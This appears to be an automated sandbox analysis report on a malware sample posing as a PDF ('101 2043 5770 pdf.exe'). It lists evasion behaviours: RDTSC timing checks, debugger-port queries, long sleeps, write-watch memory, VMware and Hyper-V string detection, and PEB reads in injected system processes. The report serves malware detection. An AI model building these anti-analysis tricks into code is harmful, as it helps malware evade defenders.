Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D944
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D504
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D544
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D324
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430774
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB4430154
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D8A4
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442DA44
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	API/Special instruction interceptor: Address: 7FFDB442D1E4
Source: C:\Windows\SysWOW64\ipconfig.exe	API/Special instruction interceptor: Address: 7FFDB442D744

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49904 second address: C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: C49B7E second address: C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09904 second address: C0990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\cmmon32.exe	RDTSC instruction interceptor: First address: C09B7E second address: C09B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	RDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9904 second address: 2CC990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe	RDTSC instruction interceptor: First address: 2CC9B7E second address: 2CC9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe	Memory allocated: 29D371B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 2653FB80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\101 2043 5770 pdf.exe	Memory allocated: 1EBFD450000 memory reserve \| memory write watch

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5007	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4808	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 5190	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4752	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 771	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 744	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 1671	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Window / User API: threadDelayed 8297	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2889
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5890
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3699

Found evasive API chain (date check)

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	API coverage: 2.2 %
Source: C:\Windows\SysWOW64\ipconfig.exe	API coverage: 2.3 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5612	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -10380000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7160	Thread sleep time: -9504000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 1671 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -3342000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep count: 8297 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe TID: 3768	Thread sleep time: -16594000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716	Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976	Thread sleep time: -4611686018427385s >= -30000s

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\ipconfig.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\101 2043 5770 pdf.exe

Code function: 0_2_00007FF7D7861C90 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,

0_2_00007FF7D7861C90

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000007.00000002.4598436939.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000007.00000000.2132972491.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000007.00000000.2132377434.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.4598436939.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: 101 2043 5770 pdf.exe, 101 2043 5770 pdf.exe.0.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000000.2132377434.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 00000007.00000000.2149784147.000000000C36E000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@]
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000002.4598436939.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.2132377434.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 00000007.00000002.4602699260.000000000C377000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000007.00000002.4602988292.000000000C477000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94
Source: explorer.exe, 00000007.00000000.2130363042.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000007.00000002.4598436939.00000000098E3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 00000007.00000002.4580392936.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 101 2043 5770 pdf.exe, 0000000D.00000002.2276739444.000002653FC55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}R

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_00409AB0 rdtsc

6_2_00409AB0

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Code function: 6_2_0040ACF0 LdrLoadDll,

6_2_0040ACF0

Contains functionality to read the PEB

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E59C mov eax, dword ptr fs:[00000030h]	6_2_0599E59C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059EB594 mov eax, dword ptr fs:[00000030h]	6_2_059EB594
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05994588 mov eax, dword ptr fs:[00000030h]	6_2_05994588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov eax, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05962582 mov ecx, dword ptr fs:[00000030h]	6_2_05962582
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0595758F mov eax, dword ptr fs:[00000030h]	6_2_0595758F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A1F5BE mov eax, dword ptr fs:[00000030h]	6_2_05A1F5BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059F35BA mov eax, dword ptr fs:[00000030h]	6_2_059F35BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598F5B0 mov eax, dword ptr fs:[00000030h]	6_2_0598F5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059845B1 mov eax, dword ptr fs:[00000030h]	6_2_059845B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059FD5B0 mov eax, dword ptr fs:[00000030h]	6_2_059FD5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815A9 mov eax, dword ptr fs:[00000030h]	6_2_059815A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059E05A7 mov eax, dword ptr fs:[00000030h]	6_2_059E05A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059895DA mov eax, dword ptr fs:[00000030h]	6_2_059895DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059665D0 mov eax, dword ptr fs:[00000030h]	6_2_059665D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599A5D0 mov eax, dword ptr fs:[00000030h]	6_2_0599A5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov eax, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059DD5D0 mov ecx, dword ptr fs:[00000030h]	6_2_059DD5D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599E5CF mov eax, dword ptr fs:[00000030h]	6_2_0599E5CF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059955C0 mov eax, dword ptr fs:[00000030h]	6_2_059955C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A355C9 mov eax, dword ptr fs:[00000030h]	6_2_05A355C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059815F4 mov eax, dword ptr fs:[00000030h]	6_2_059815F4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_05A335D7 mov eax, dword ptr fs:[00000030h]	6_2_05A335D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0599C5ED mov eax, dword ptr fs:[00000030h]	6_2_0599C5ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_059625E0 mov eax, dword ptr fs:[00000030h]	6_2_059625E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Code function: 6_2_0598E5E7 mov eax, dword ptr fs:[00000030h]	6_2_0598E5E7
